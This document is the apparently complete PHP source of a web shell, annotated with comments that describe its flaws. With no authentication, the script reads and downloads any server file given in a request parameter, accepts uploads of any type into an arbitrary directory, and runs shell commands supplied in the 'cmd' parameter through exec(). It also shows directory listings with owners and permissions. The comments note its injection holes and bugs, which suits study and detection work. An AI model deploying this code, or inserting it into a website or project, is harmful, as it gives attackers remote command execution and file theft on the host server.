</body></html>

Original PHP code

<?php

if (isset($_GET['download'])) { // file-read branch: runs before any HTML, no authentication check
	$file = $_GET['download']; // caller-supplied path, used verbatim with no base-directory restriction
	if (file_exists($file)) {
	    header('Content-Description: File Transfer');
	    header('Content-Type: application/octet-stream');
	    header('Content-Disposition: attachment; filename="'.basename($file).'"'); // basename() only shapes the save-as name
	    header('Expires: 0');
	    header('Cache-Control: must-revalidate');
	    header('Pragma: public');
	    header('Content-Length: ' . filesize($file));
	    readfile($file); // streams back any file the PHP process can read
	    exit; // stop so the HTML interface is not appended to the file bytes
	}
}

?>

<html>
<!-- Latest compiled and minified CSS -->
<link rel="stylesheet" href="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css">

<!-- jQuery library -->
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.2/jquery.min.js"></script>

<!-- Latest compiled JavaScript -->
<script src="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/js/bootstrap.min.js"></script>

<div class="container">


<?php

function printPerms($file) { // returns an ls-style string such as 'drwxrwxrwx' built from fileperms($file)
	$mode = fileperms($file); // failure return is not checked
	if( $mode & 0x1000 ) { $type='p'; } // type tests AND a single mask instead of comparing ($mode & 0xF000)
	else if( $mode & 0x2000 ) { $type='c'; } // also matches 0x6000 and 0xA000, which are then shown as 'c'
	else if( $mode & 0x4000 ) { $type='d'; } // also matches 0xC000, which is then shown as 'd'
	else if( $mode & 0x6000 ) { $type='b'; } // never taken: both bits were already tested above
	else if( $mode & 0x8000 ) { $type='-'; }
	else if( $mode & 0xA000 ) { $type='l'; } // never taken: both bits were already tested above
	else if( $mode & 0xC000 ) { $type='s'; } // never taken: both bits were already tested above
	else $type='u'; // none of the tested bits set
	$owner["read"] = ($mode & 00400) ? 'r' : '-'; // plain rwx bits for owner, group and world follow (octal masks)
	$owner["write"] = ($mode & 00200) ? 'w' : '-';
	$owner["execute"] = ($mode & 00100) ? 'x' : '-';
	$group["read"] = ($mode & 00040) ? 'r' : '-';
	$group["write"] = ($mode & 00020) ? 'w' : '-';
	$group["execute"] = ($mode & 00010) ? 'x' : '-';
	$world["read"] = ($mode & 00004) ? 'r' : '-';
	$world["write"] = ($mode & 00002) ? 'w' : '-';
	$world["execute"] = ($mode & 00001) ? 'x' : '-';
	if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S'; // setuid bit replaces the owner execute column
	if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S'; // setgid bit replaces the group execute column
	if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T'; // sticky bit replaces the world execute column
	$s=sprintf("%1s", $type); // "%1s" is a minimum width of one, i.e. plain concatenation
	$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
	$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
	$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
	return $s;
}


$dir = $_GET['dir']; // main handler: working directory comes from the request; read without isset(), so NULL on a bare request
if (isset($_POST['dir'])) {
	$dir = $_POST['dir']; // a POSTed `dir` overrides the query parameter
}
$file = '';
if ($dir == NULL or !is_dir($dir)) { // missing or non-directory input falls back to './'
	if (is_file($dir)) {
		echo "enters"; // looks like leftover debugging output
		$file = $dir; // $file is not read again in this listing
		echo $file; // request value echoed without escaping
	}
	$dir = './';
}
$dir = realpath($dir.'/'.$value); // $value is not assigned yet here, so this resolves "$dir/" to an absolute path

$dirs = scandir($dir);
echo "<h2>Viewing directory " . $dir . "</h2>"; // $dir is written into the page without HTML escaping
echo "\n<br><form action='".$_SERVER['PHP_SELF']."' method='GET'>"; // command form submits via GET, so `cmd` values end up in request URLs
echo "<input type='hidden' name='dir' value=".$dir." />"; // attribute value is unquoted and unescaped
echo "<input type='text' name='cmd' autocomplete='off' autofocus>\n<input type='submit' value='Execute'>\n";
echo "</form>";
echo "\n<br>\n<div class='navbar-form'><form action='".$_SERVER['PHP_SELF']."' method='POST' enctype='multipart/form-data'>\n";
echo "<input type='hidden' name='dir' value='".$_GET['dir']."'/> "; // upload form carries the raw $_GET['dir'], not the resolved $dir
echo "<input type='file' name='fileToUpload' id='fileToUpload'>\n<br><input type='submit' value='Upload File' name='submit'>";
echo "</div>";

if (isset($_POST['submit'])) { // file-write branch: no check on extension, content type or size
	$uploadDirectory = $dir.'/'.basename($_FILES['fileToUpload']['name']); // client-supplied name, reduced by basename()
	if (file_exists($uploadDirectory)) { // the only guard: an existing path is not overwritten
    	echo "<br><br><b style='color:red'>Error. File already exists in ".$uploadDirectory.".</b></br></br>";
	}
	else if (move_uploaded_file($_FILES['fileToUpload']['tmp_name'], $uploadDirectory)) { // writes wherever the PHP process has write access
		echo '<br><br><b>File '.$_FILES['fileToUpload']['name'].' uploaded successfully in '.$dir.' !</b><br>';
	} else {
		echo '<br><br><b style="color:red">Error uploading file '.$uploadDirectory.'</b><br><br>';

	}

}

if (isset($_GET['cmd'])) { // command-execution branch, reachable without authentication
	echo "<br><br><b>Result of command execution: </b><br>";
	exec('cd '.$dir.' && '.$_GET['cmd'], $cmdresult); // request value concatenated into a shell command line, run as the PHP process
	foreach ($cmdresult as $key => $value) {
		echo "$value \n<br>"; // command output echoed without escaping
	}
}
echo "<br>";
?>

<table class="table table-hover table-bordered">
    <thead>
      <tr>
        <th>Name</th>
        <th>Owner</th>
        <th>Permissions</th>
      </tr>
    </thead>
    <tbody>
<?php
foreach ($dirs as $key => $value) { // one table row per scandir() entry; names and paths are echoed unescaped
	echo "<tr>";
	if (is_dir(realpath($dir.'/'.$value))) { // directories link back to this script with ?dir=<resolved path>/
		echo "<td><a href='". $_SERVER['PHP_SELF'] . "?dir=". realpath($dir.'/'.$value) . "/'>". $value . "</a></td><td>". posix_getpwuid(fileowner($dir.'/'.$value))[name] . "</td><td> " . printPerms($dir) . "</td>\n"; // [name] is a bare constant (an Error from PHP 8); printPerms() gets $dir, not the entry
	}
	else { // everything else links to the download branch with ?download=<resolved path>
		echo "<td><a href='". $_SERVER['PHP_SELF'] . "?download=". realpath($dir.'/'.$value) . "'>". $value . "</a></td><td>". posix_getpwuid(fileowner($dir.'/'.$value))[name] ."</td><td> " . printPerms($dir) . "</td>\n"; // same two quirks: bare `name` constant, permissions of $dir shown for every row
	}
	echo "</tr>";
}
echo "</tbody>";
echo "</table>";


?>



</div>
</html>